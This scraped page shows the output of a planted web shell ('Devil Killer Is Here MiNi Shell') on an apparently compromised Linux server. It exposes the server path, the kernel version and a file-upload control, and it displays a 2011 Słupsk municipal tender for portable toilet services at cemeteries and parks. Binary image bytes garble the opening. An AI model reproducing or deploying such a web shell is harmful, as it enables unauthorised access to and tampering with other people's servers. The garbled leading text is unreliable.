JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110208/44859-N-2011.html

<p class="kh_header"><b>Słupsk: WYNAJEM I KOMPLEKSOWA OBSŁUGA   KABIN   SANITARNYCH   NA   
   CMENTARZACH  KOMUNALNYCH  I TERENACH  ZIELENI MIEJSKIEJ      
   W  SŁUPSKU</b><br>
<b>Numer ogłoszenia: 44859 - 2011; data zamieszczenia: 08.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku , ul. Kaszubska 4, 76-200 Słupsk, woj. pomorskie, tel. 059 8413722, 059 8481451, faks 059 8413723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztzmick.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYNAJEM I KOMPLEKSOWA OBSŁUGA   KABIN   SANITARNYCH   NA   
   CMENTARZACH  KOMUNALNYCH  I TERENACH  ZIELENI MIEJSKIEJ      
   W  SŁUPSKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest  kompleksowa obsługa  kabin sanitarnych na cmentarzach komunalnych i terenach zieleni miejskiej w Słupsku  zgodnie z zakresem i w terminach określonych w rozdziale II  Specyfikacji Istotnych Warunków Zamówienia.
2.Opis przedmiotu zamówienia  dla trzech zadań stanowi rozdział II  SIWZ.
1)  Zadanie  nr  1 - wynajem i kompleksowa obsługa kabin na cmentarzach komunalnych w  
                                Słupsku,
2)  Zadanie  nr  2  -wynajem i kompleksowa obsługa kabin na terenie bulwaru    
                                   im. Popiełuszki  i na skwerze Kościuszki w Słupsku.
3)  Zadanie  nr  3  - wynajem i kompleksowa obsługa kabiny na terenie PKiW w Słupsku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówienia uzupełniającego, o którym mowa w art.67 ust.  	6  i     
          7 ustawy - Prawo zamówień publicznych dotychczasowemu Wykonawcy, stanowiącego nie 	więcej niż 50% wartości  zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przed złożeniem oferty tj. do dnia 15 lutego 2011r. do godz. 9.00 Wykonawcy 
	powinni wnieść wadium  w kwocie: zad. 1 -1000,00 zł., zad. 2- 500,00 zł. zad. 3 -100,00 zł.
2.Wadium powinno być wniesione w formie określonej z art. 45 ust. 6 ustawy- Prawo zamówień publicznych.
3.Jeżeli wadium będzie wniesione w pieniądzu, powinno być wpłacone  na rachunek bankowy ZTZMiCK w Słupsku nr 80124037701111000040698322.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni posiadać atesty Państwowego Instytutu Higieny,na eksploatację kabin, stosowanie  płynów 
							

		dezynfekujących oraz zezwolenie na przewóz i odprowadzanie fekaliów,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykonywali w okresie ostatnich 
           3 lat licząc od daty wszczęcia niniejszego postępowania  3 usługi o tożsamym  	charakterze z 	przedmiotem zamówienia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie spełniony dla trzech zadań , jeżeli   Wykonawca wykaże się  sprzętem do   	         wykonania zamówienia, w tym: 
		a/ kabinami sanitarnymi ( w kolorze zielonym lub niebieskim)  w liczbie 16 szt.,
		b/ dwoma samochodami z urządzeniami do mycia, opróżniania i odkażania fekaliów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie spełniony dla trzech zadań , jeżeli 		         Wykonawca wykaże zatrudnienie 3  osób w ciągu ostatnich 12 miesięcy przed dniem 	         wszczęcia  postępowania;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 20.000,00zł na zadanie nr 1, 10.000 zł na zadanie nr 2  i  3000,00 zł na zadanie nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  wypełniony formularz oferty - załącznik nr 1 do SIWZ,
                  2)  oświadczenie o przyjęciu warunków przetargu, akceptacji treści SIWZ i wzoru 	umowy stanowiącej jej integralną część - załącznik nr 2 do SIWZ,
4)oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych - załącznik nr 3 do SIWZ wraz z dokumentami potwierdzającymi posiadanie uprawnień do wykonywania


                 
 działalności w zakresie objętym przedmiotem zamówienia,
5)dowód wniesienia wadium,
6)parafowany i wypełniony  wzór umowy  -  załącznik nr 5 do SIWZ,
7)harmonogram płatności dla zadania nr 1 - załącznik nr 1 do umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści  
          oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie zmiany osób  
          odpowiedzialnych po stronie Zamawiającego i Wykonawcy za realizację umowy oraz 
           terminu serwisów, zmiany ilości serwisów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztzmick.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku
ul. Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2011 godzina 09:00, miejsce: Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku
ul. Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie  nr  1 - wynajem i kompleksowa obsługa kabin na cmentarzach komunalnych w  
                                Słupsku,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1)wynajęcie trzech kabin sanitarnych w okresie od 01 kwietnia 2011r. do 31 marca 2014r, które zostaną ustawione w Słupsku na cmentarzach komunalnych: dwie przy ul.  Rabina dr Maxa Josepha  i jedna przy ul. Zachodniej,
2)wykonywanie jeden raz w tygodniu serwisu obejmującego:
a) opróżnianie i odkażanie zbiornika na fekalia,
b) mycie i opróżnianie całej kabiny,
c) uzupełnianie materiałów eksploatacyjnych i papieru toaletowego,
d) wykonanie niezbędnych napraw,
e) wlewanie świeżego płynu ekologicznego.
3)wynajęcie dziesięciu kabin sanitarnych w okresie święta zmarłych tj. od 21 października  do 03 listopada każdego roku trwania umowy, które zostaną ustawione w Słupsku na cmentarzach komunalnych: sześciu  przy ul. Rabina dr Maxa Josepha i dwie przy ul. Zachodniej. Wykonanie serwisu określonego w pkt. 2 oraz wykonanie serwisów nie mniej niż 6 razy w tym okresie. od 21.października  do 03  listopada każdego roku. Zamawiający zastrzega sobie zarówno zmniejszenie jak i zwiększenie ilości serwisów w zależności od potrzeb . 
4)liczba serwisów na zadanie nr 1  wynosi 690 przez czas trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie  nr  2  -wynajem i kompleksowa obsługa kabin na terenie bulwaru    
                                   im. Popiełuszki  i na skwerze Kościuszki w Słupsku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
       1)  wynajęcie  dwóch  kabin sanitarnych w okresie od 01 czerwca  do 30 września  	każdego roku trwania umowy które 	zostaną ustawione w Słupsku na  terenie 	Parku Kultury i Wypoczynku przy ul. Drewnianej : 
a) jedna kabina zostanie ustawiona w  tzw. starej części PKiW ( od strony Instytutu  
    Meteorologii),
b) druga kabina zostanie ustawiona w tzw. nowej części PKiW, 
       2) wykonawca będzie dokonywał serwisu kabin określonych w   ust. 1 dwa razy w 	tygodniu w czerwcu i wrześniu oraz trzy razy w tygodniu w lipcu i  sierpniu .
       3) liczba niezbędnych serwisów wynosi 258 przez czas trwania umowy,
       4) wWykonywanie serwisu zgodnie z ust. 2 obejmującego:
a) opróżnianie i odkażanie zbiornika na fekalia,
b) mycie i opróżnianie całej kabiny,
c) uzupełnianie materiałów eksploatacyjnych i papieru toaletowego,
d) wykonanie niezbędnych napraw,
            e) wlewanie świeżego płynu ekologicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie  nr  3  - wynajem i kompleksowa obsługa kabiny na terenie PKiW w Słupsku,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
       1)  wynajęcie  dwóch  kabin sanitarnych w okresie od 01 stycznia do 31 stycznia  	każdego roku trwania umowy które 	zostaną ustawione w Słupsku na  terenach: 
a) jedna kabina zostanie ustawiona na terenie bulwaru im. Jerzego Popiełuszki 
    przy  rzece Słupi od strony Baszty Czarownic,   
b) druga kabina zostanie ustawiona na skwerze przy ul. Kościuszki,      
       2) wykonawca będzie dokonywał serwisu kabin jeden raz w tygodniu,
       3) liczba serwisów wynosi  54,  przez czas trwania umowy,
       4) wykonywanie dwóch serwisów w tygodniu  obejmujących:
a) opróżnianie i odkażanie zbiornika na fekalia,
b) mycie i opróżnianie całej kabiny,
c) uzupełnianie materiałów eksploatacyjnych i papieru toaletowego,
d) wykonanie niezbędnych napraw,
e) wlewanie świeżego płynu ekologicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com